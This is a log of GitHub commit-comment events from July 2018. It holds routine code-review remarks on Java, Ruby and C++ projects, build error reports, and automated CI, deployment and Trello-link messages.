{"id":"7985916384","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757049,"position":140,"line":140,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:58:17Z","updated_at":"2018-07-18T22:58:17Z","author_association":"NONE","body":"Replace with a loop for `i` in `{1,2,3}`"}},"created_at":"2018-07-18T22:58:17Z"}
{"id":"7985917150","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29757051,"position":null,"line":null,"path":null,"commit_id":"c0e5ac1dfa997810cf9505eb19a15b2272b96e32","created_at":"2018-07-18T22:58:32Z","updated_at":"2018-07-18T22:58:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a login system around the MVP](https://trello.com/c/VST9i88Y/12-create-a-login-system-around-the-mvp)"}},"created_at":"2018-07-18T22:58:32Z"}
{"id":"7985917384","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757052,"position":93,"line":93,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConfigItemEnchantments.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:58:37Z","updated_at":"2018-07-18T22:58:37Z","author_association":"OWNER","body":"possible NPE"}},"created_at":"2018-07-18T22:58:37Z"}
{"id":"7985918637","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/w2schools-angularjs"},"payload":{"comment":{"id":29757054,"position":null,"line":null,"path":null,"commit_id":"5398676ff6e575f9bef782331e9bc7dbc021ebdc","created_at":"2018-07-18T22:59:01Z","updated_at":"2018-07-18T22:59:01Z","author_association":"OWNER","body":"![screen shot 2018-07-18 at 5 58 46 pm](https://user-images.githubusercontent.com/13053013/42912281-3f40a1ce-8ab4-11e8-9cae-50d920f28f07.png)\r\n"}},"created_at":"2018-07-18T22:59:01Z"}
{"id":"7985918986","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757057,"position":10,"line":10,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:59:08Z","updated_at":"2018-07-18T22:59:08Z","author_association":"NONE","body":"Знаю, что мы не учили массивы, но рекомендую использовать тут массив. Его легко отсортировать используя метод sort.\r\n```\r\nsides = [a, b, c].sort!\r\n```"}},"created_at":"2018-07-18T22:59:08Z"}
{"id":"7985921757","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/pantheon-d8-msgu"},"payload":{"comment":{"id":29757066,"position":null,"line":null,"path":null,"commit_id":"357f28f88a16f6d9d21c4bed8ab850b5729bbbfc","created_at":"2018-07-18T23:00:02Z","updated_at":"2018-07-18T23:00:02Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-msgu#ci-1](https://dashboard.pantheon.io/sites/4d046e32-1b47-4e39-b783-bab6f3987315#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-pantheon-d8-msgu.pantheonsite.io/)"}},"created_at":"2018-07-18T23:00:02Z"}
{"id":"7985922564","type":"CommitCommentEvent","actor":{"login":"escalade"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29757072,"position":null,"line":null,"path":null,"commit_id":"cc8569fcf8303c8e2c95e9f26beecd903c48f22c","created_at":"2018-07-18T23:00:15Z","updated_at":"2018-07-18T23:00:15Z","author_association":"NONE","body":"Fails like this:\r\n\r\n`core/rend/gles/gltex.cpp: In member function 'void TextureCacheData::Update()':\r\ncore/rend/gles/gltex.cpp:318:35: error: 'comps' was not declared in this scope\r\n    glTexImage2D(GL_TEXTURE_2D, 0, comps, w, h, 0, comps, textype, temp_tex_buffer);\r\n                                   ^~~~~\r\ncore/rend/gles/gltex.cpp:318:35: note: suggested alternative: 'cos'\r\n    glTexImage2D(GL_TEXTURE_2D, 0, comps, w, h, 0, comps, textype, temp_tex_buffer);\r\n                                   ^~~~~\r\n                                   cos\r\n`"}},"created_at":"2018-07-18T23:00:15Z"}
{"id":"7985925742","type":"CommitCommentEvent","actor":{"login":"Jeffchiucp"},"repo":{"name":"Broaden-io/Broaden-io-server"},"payload":{"comment":{"id":29757083,"position":null,"line":null,"path":null,"commit_id":"a916ca278102690d75a2efec0cebdd59368a93b6","created_at":"2018-07-18T23:01:09Z","updated_at":"2018-07-18T23:01:09Z","author_association":"MEMBER","body":"I was wondering if you hit an error with  sequelize migration\r\n`== 20180702040716-MoreChangesToRubricModel: migrating =======\r\n\r\nERROR: Unexpected token ;`"}},"created_at":"2018-07-18T23:01:09Z"}
{"id":"7985925834","type":"CommitCommentEvent","actor":{"login":"ozank"},"repo":{"name":"EnesAyaz/GaN-Modeling"},"payload":{"comment":{"id":29757084,"position":null,"line":null,"path":null,"commit_id":"242514f94faa2341ceaeca6d2764b44407e607d1","created_at":"2018-07-18T23:01:11Z","updated_at":"2018-07-18T23:01:11Z","author_association":"NONE","body":"Hadi hayırlı uğurlu olsun :clap: :clap: "}},"created_at":"2018-07-18T23:01:11Z"}
{"id":"7985925988","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757085,"position":6,"line":6,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstEnchantmentOffer.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:01:14Z","updated_at":"2018-07-18T23:01:14Z","author_association":"OWNER","body":"This one and the other similar named classes modelling enchantments are a bit confusing in regards to what they actually do/represent. Writing 1 or 2 lines of javadoc for those classes would help a lot understanding those quickly"}},"created_at":"2018-07-18T23:01:14Z"}
{"id":"7985927117","type":"CommitCommentEvent","actor":{"login":"Trikolon"},"repo":{"name":"SpigotMC/BungeeCord"},"payload":{"comment":{"id":29757089,"position":null,"line":null,"path":null,"commit_id":"76dc32ee3259c9d52ce71467c926c055693f5e92","created_at":"2018-07-18T23:01:35Z","updated_at":"2018-07-18T23:01:35Z","author_association":"NONE","body":"Is IPv6 even supported by the Minecraft client? I've recently checked if BungeeCord supported IPv6 and stumbled across this line."}},"created_at":"2018-07-18T23:01:35Z"}
{"id":"7985927435","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757091,"position":11,"line":7,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T23:01:40Z","updated_at":"2018-07-18T23:01:40Z","author_association":"NONE","body":"Ну раз уж ты решил сделать проверку то лучше написать так\r\n```\r\nunless your_name.empty?\r\n  # do something\r\nend\r\n```\r\nТак лучше читает на английском"}},"created_at":"2018-07-18T23:01:40Z"}
{"id":"7985928244","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757094,"position":11,"line":7,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T23:01:56Z","updated_at":"2018-07-18T23:01:56Z","author_association":"NONE","body":"Индентация"}},"created_at":"2018-07-18T23:01:56Z"}
{"id":"7985930332","type":"CommitCommentEvent","actor":{"login":"trubitsyn"},"repo":{"name":"SimpleMobileTools/Simple-Notes"},"payload":{"comment":{"id":29757103,"position":null,"line":null,"path":null,"commit_id":"8efb97dbd05f7d867f1cc80d2047adb67c6e3dff","created_at":"2018-07-18T23:02:34Z","updated_at":"2018-07-18T23:02:34Z","author_association":"CONTRIBUTOR","body":"Great, thank you!"}},"created_at":"2018-07-18T23:02:34Z"}
{"id":"7985931233","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29757104,"position":null,"line":null,"path":null,"commit_id":"9c26cce2cc82873d84af8507d49050d768f93ea5","created_at":"2018-07-18T23:02:53Z","updated_at":"2018-07-18T23:02:53Z","author_association":"OWNER","body":"Fixes #14 "}},"created_at":"2018-07-18T23:02:53Z"}
{"id":"7985932239","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757110,"position":8,"line":8,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstEnchantmentOffer.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:03:12Z","updated_at":"2018-07-18T23:03:12Z","author_association":"OWNER","body":"Generally you shouldnt be using public in java for instance variables. It all comes back to encapsulation, what if you want to change this representation one day?\r\n\r\nSee:\r\nhttps://softwareengineering.stackexchange.com/questions/176876/why-shouldnt-i-be-using-public-variables-in-my-java-class"}},"created_at":"2018-07-18T23:03:12Z"}
{"id":"7985932911","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/w2schools-angularjs"},"payload":{"comment":{"id":29757112,"position":null,"line":null,"path":null,"commit_id":"62f839608ded3a293289eb15ce03bcb09757df7e","created_at":"2018-07-18T23:03:25Z","updated_at":"2018-07-18T23:03:25Z","author_association":"OWNER","body":"![screen shot 2018-07-18 at 6 02 23 pm](https://user-images.githubusercontent.com/13053013/42912399-dc79d2c6-8ab4-11e8-8cc4-72f0e88fb6fb.png)\r\n"}},"created_at":"2018-07-18T23:03:25Z"}
{"id":"7985933116","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757114,"position":11,"line":11,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstLeveledEnchantment.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:03:28Z","updated_at":"2018-07-18T23:03:28Z","author_association":"OWNER","body":"blah blah public instance variable"}},"created_at":"2018-07-18T23:03:28Z"}
{"id":"7985936487","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757128,"position":16,"line":12,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T23:04:32Z","updated_at":"2018-07-18T23:04:32Z","author_association":"NONE","body":"Что-б избежать вложенных условий можешь вынести это выражение в отдельный if по раньше и прервать выполнение программы в случае, если мы зайдем в этот блок"}},"created_at":"2018-07-18T23:04:32Z"}
{"id":"7985938665","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757130,"position":17,"line":13,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T23:05:15Z","updated_at":"2018-07-18T23:05:15Z","author_association":"NONE","body":"# получается для роста 111 - идеальный вес должен быть 1 кг !!! БРЕД !!! )))\r\n\r\nУ карликов свои стандарты. Нам не понять)"}},"created_at":"2018-07-18T23:05:15Z"}
{"id":"7985944693","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757137,"position":16,"line":12,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T23:07:14Z","updated_at":"2018-07-18T23:07:14Z","author_association":"NONE","body":"И учитывай все замечания, что я раньше писал. Вместо your_height != 0 лучше уж проверить, что не <= 0."}},"created_at":"2018-07-18T23:07:14Z"}
{"id":"7985947723","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29757145,"position":22,"line":18,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T23:08:14Z","updated_at":"2018-07-18T23:08:14Z","author_association":"NONE","body":"конкатенация, индентация"}},"created_at":"2018-07-18T23:08:14Z"}
{"id":"7985949386","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757147,"position":20,"line":20,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantingTableUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:08:49Z","updated_at":"2018-07-18T23:08:49Z","author_association":"OWNER","body":"Your code becomes a lot easier to read if you generally apply the principle of failing fast. This means that you want to return explicitly as early as possible when somethign is wrong or you know the result. Here you could refactor to something like\r\n\r\n```\r\nif (table == null) {\r\n  return 0;\r\n}\r\nfor( ....\r\n\r\n```\r\n\r\nIt's functionally the same, but easier to read, because you have less things to \"remember\" while reading that loop and you have less intendation. Here the effect isn't too big because it's just one if, but keeping that principle in mind is good and there are cases like command parsing where you can easily end up with tons of unneccessarily stacked ifs when not following it."}},"created_at":"2018-07-18T23:08:49Z"}
{"id":"7985956393","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"loki-project/loki"},"payload":{"comment":{"id":29757166,"position":20,"line":114,"path":"src/cryptonote_core/cryptonote_tx_utils.cpp","commit_id":"834ad89783bbecb76addc0de75164a0f9a8583e6","created_at":"2018-07-18T23:11:05Z","updated_at":"2018-07-18T23:11:05Z","author_association":"COLLABORATOR","body":"I will rip this division out into a helper function, it's used three times in exactly the same way"}},"created_at":"2018-07-18T23:11:05Z"}
{"id":"7985957527","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757170,"position":1,"line":1476,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:11:27Z","updated_at":"2018-07-18T23:11:27Z","author_association":"NONE","body":"@@  -1476,7  +1476,7  @@"}},"created_at":"2018-07-18T23:11:27Z"}
{"id":"7985959693","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"loki-project/loki"},"payload":{"comment":{"id":29757180,"position":5,"line":40,"path":"src/cryptonote_core/cryptonote_tx_utils.h","commit_id":"834ad89783bbecb76addc0de75164a0f9a8583e6","created_at":"2018-07-18T23:12:14Z","updated_at":"2018-07-18T23:12:14Z","author_association":"COLLABORATOR","body":"Split arguments onto multiple lines"}},"created_at":"2018-07-18T23:12:14Z"}
{"id":"7985960256","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29757182,"position":null,"line":null,"path":null,"commit_id":"bda1957cfaef08bf2f5c5971c4dc9077e0ccdc37","created_at":"2018-07-18T23:12:27Z","updated_at":"2018-07-18T23:12:27Z","author_association":"COLLABORATOR","body":"1)  Yes, this is only an issue here because we are trying to fake the FPGA output using TBN data that has a greater bit depth.\r\n2)  I think it is how the problem was coded.  It ended up being nchan*GRID_SIZE**2 sets of matrix multiplies where the input matrices are (npol,ntime_gulp).  The multiply probably gets more efficient as ntime_gulp goes up but that GRID_SIZE\\**2 is hard to overcome.\r\n3)  The conversion from ci8 to ci4 was the last large thing I wanted to do for now.  There is still the question of getting ci8 data into the `matmul()` but I don't have a convenient way to test any of that code."}},"created_at":"2018-07-18T23:12:27Z"}
{"id":"7985960426","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29757183,"position":null,"line":null,"path":null,"commit_id":"e33bc5bc1f50cc35c72802e301ef89a8b763e120","created_at":"2018-07-18T23:12:29Z","updated_at":"2018-07-18T23:12:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-809](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-809).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-809-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-18T23:12:29Z"}
{"id":"7985963110","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757188,"position":8,"line":1482,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:13:25Z","updated_at":"2018-07-18T23:13:25Z","author_association":"NONE","body":"\t\t@@ -1993,12 +1993,14 @@"}},"created_at":"2018-07-18T23:13:25Z"}
{"id":"7985965230","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757194,"position":24,"line":24,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantingTableUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:14:08Z","updated_at":"2018-07-18T23:14:08Z","author_association":"OWNER","body":"Vanilla minecraft also checks if there is air inbetween the shelf and the table and only counts the shelf if there's nothing blocking the path. This is really nice because it lets you dynamically create lower level enchanting tables for stuff like DS3 or FF4 by blocking shelves and not having to them.\r\n\r\nYour plugin would break that"}},"created_at":"2018-07-18T23:14:08Z"}
{"id":"7985965661","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757195,"position":13,"line":1996,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:14:18Z","updated_at":"2018-07-18T23:14:18Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:14:18Z"}
{"id":"7985966230","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29757196,"position":17,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T23:14:31Z","updated_at":"2018-07-18T23:14:31Z","author_association":"NONE","body":"Так выводи дискриминант. Мы то говорим про вычисление квадратного корня"}},"created_at":"2018-07-18T23:14:31Z"}
{"id":"7985966683","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29757198,"position":1,"line":1,"path":".settings/org.eclipse.core.resources.prefs","commit_id":"a248497b722c154eb0415c5cc438fcc929f5e6eb","created_at":"2018-07-18T23:14:39Z","updated_at":"2018-07-18T23:14:39Z","author_association":"CONTRIBUTOR","body":"a character encoding for a joke"}},"created_at":"2018-07-18T23:14:39Z"}
{"id":"7985967097","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/w2schools-angularjs"},"payload":{"comment":{"id":29757200,"position":null,"line":null,"path":null,"commit_id":"a2662a28a4c9c20ecc8bcbf6ab018c1c45d8165d","created_at":"2018-07-18T23:14:47Z","updated_at":"2018-07-18T23:14:47Z","author_association":"OWNER","body":"![screen shot 2018-07-18 at 6 13 26 pm](https://user-images.githubusercontent.com/13053013/42912707-70581e3e-8ab6-11e8-8e09-27f285c1702e.png)\r\n"}},"created_at":"2018-07-18T23:14:47Z"}
{"id":"7985967216","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757201,"position":5,"line":1479,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:14:50Z","updated_at":"2018-07-18T23:14:50Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:14:50Z"}
{"id":"7985968731","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29757206,"position":null,"line":null,"path":null,"commit_id":"5dd1d9581c9c08c47ddb5c4092acff17e06d1ebc","created_at":"2018-07-18T23:15:21Z","updated_at":"2018-07-18T23:15:21Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-1](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-msgu.pantheonsite.io/)"}},"created_at":"2018-07-18T23:15:21Z"}
{"id":"7985968925","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757207,"position":20,"line":2003,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:15:25Z","updated_at":"2018-07-18T23:15:25Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:15:25Z"}
{"id":"7985970921","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757210,"position":23,"line":2006,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:16:07Z","updated_at":"2018-07-18T23:16:07Z","author_association":"NONE","body":"\t@@ -2044,12 +2046,14 @@"}},"created_at":"2018-07-18T23:16:07Z"}
{"id":"7985972359","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"loki-project/loki"},"payload":{"comment":{"id":29757212,"position":51,"line":142,"path":"src/cryptonote_core/service_node_list.cpp","commit_id":"834ad89783bbecb76addc0de75164a0f9a8583e6","created_at":"2018-07-18T23:16:37Z","updated_at":"2018-07-18T23:16:37Z","author_association":"COLLABORATOR","body":"Refactor: make a monday task to move the presence of tx extra data structures for registration and deregistration out of the business logic. Create classes to represent these things in loki:: namespace. Move service node list and quorum into loki:: namespace. Make service node list owned by blockchain, not core."}},"created_at":"2018-07-18T23:16:37Z"}
{"id":"7985974512","type":"CommitCommentEvent","actor":{"login":"akircher01"},"repo":{"name":"akircher01/CodeLouisvilleProject"},"payload":{"comment":{"id":29757218,"position":null,"line":null,"path":null,"commit_id":"b373b1354c1cda9639e7b1b3d2ec93e79f280c8f","created_at":"2018-07-18T23:17:21Z","updated_at":"2018-07-18T23:17:21Z","author_association":"OWNER","body":"Added REadme"}},"created_at":"2018-07-18T23:17:21Z"}
{"id":"7985974848","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757219,"position":28,"line":2049,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:17:29Z","updated_at":"2018-07-18T23:17:29Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:17:29Z"}
{"id":"7985974945","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29757220,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T23:17:31Z","updated_at":"2018-07-18T23:17:31Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-18T23:17:31Z"}
{"id":"7985975402","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757222,"position":35,"line":2056,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:17:41Z","updated_at":"2018-07-18T23:17:41Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:17:41Z"}
{"id":"7985979096","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29757233,"position":null,"line":null,"path":null,"commit_id":"4a400d2c0f0f7548c3dfc2afda0b7427cd997b14","created_at":"2018-07-18T23:18:56Z","updated_at":"2018-07-18T23:18:56Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-420](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-420).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-420-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T23:18:56Z"}
{"id":"7985983059","type":"CommitCommentEvent","actor":{"login":"czebos"},"repo":{"name":"czebos/Project-Euler-Solutions"},"payload":{"comment":{"id":29757241,"position":7,"line":5,"path":"README.md","commit_id":"29b92430b577502ae8f68e3758712f94b8948a02","created_at":"2018-07-18T23:20:16Z","updated_at":"2018-07-18T23:20:16Z","author_association":"OWNER","body":"Profile: projecteuler.net/profile/conradz"}},"created_at":"2018-07-18T23:20:16Z"}
{"id":"7985984800","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29757247,"position":null,"line":null,"path":null,"commit_id":"5e56c8716794e00dd832758f2de22c5f75cb1b37","created_at":"2018-07-18T23:20:53Z","updated_at":"2018-07-18T23:20:53Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-421](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-421).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-421-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T23:20:53Z"}
{"id":"7985984912","type":"CommitCommentEvent","actor":{"login":"sanchit94"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29757249,"position":null,"line":null,"path":null,"commit_id":"6137a3a2dd148b29428b29fabfec2c4e6685661e","created_at":"2018-07-18T23:20:55Z","updated_at":"2018-07-18T23:20:55Z","author_association":"COLLABORATOR","body":"Why Travis CI is broken here? Can you explain @atherdon "}},"created_at":"2018-07-18T23:20:55Z"}
{"id":"7985986300","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29757251,"position":null,"line":null,"path":null,"commit_id":"590a61be9ae1634b22d8d8d6f898165055947f65","created_at":"2018-07-18T23:21:22Z","updated_at":"2018-07-18T23:21:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a dark/light theme toggle switch](https://trello.com/c/UB2Ucyh4/16-implement-a-dark-light-theme-toggle-switch)"}},"created_at":"2018-07-18T23:21:22Z"}
{"id":"7985986825","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29757252,"position":null,"line":null,"path":null,"commit_id":"4ea85c1cd145aa19d6736c109fd7c5eacc3a439e","created_at":"2018-07-18T23:21:31Z","updated_at":"2018-07-18T23:21:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a dark/light theme toggle switch](https://trello.com/c/UB2Ucyh4/16-implement-a-dark-light-theme-toggle-switch)"}},"created_at":"2018-07-18T23:21:31Z"}
{"id":"7985987151","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29757254,"position":null,"line":null,"path":null,"commit_id":"cb0aaca57569901e68f3b7fe403a6a68e2cf0bed","created_at":"2018-07-18T23:21:37Z","updated_at":"2018-07-18T23:21:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a dark/light theme toggle switch](https://trello.com/c/UB2Ucyh4/16-implement-a-dark-light-theme-toggle-switch)"}},"created_at":"2018-07-18T23:21:37Z"}
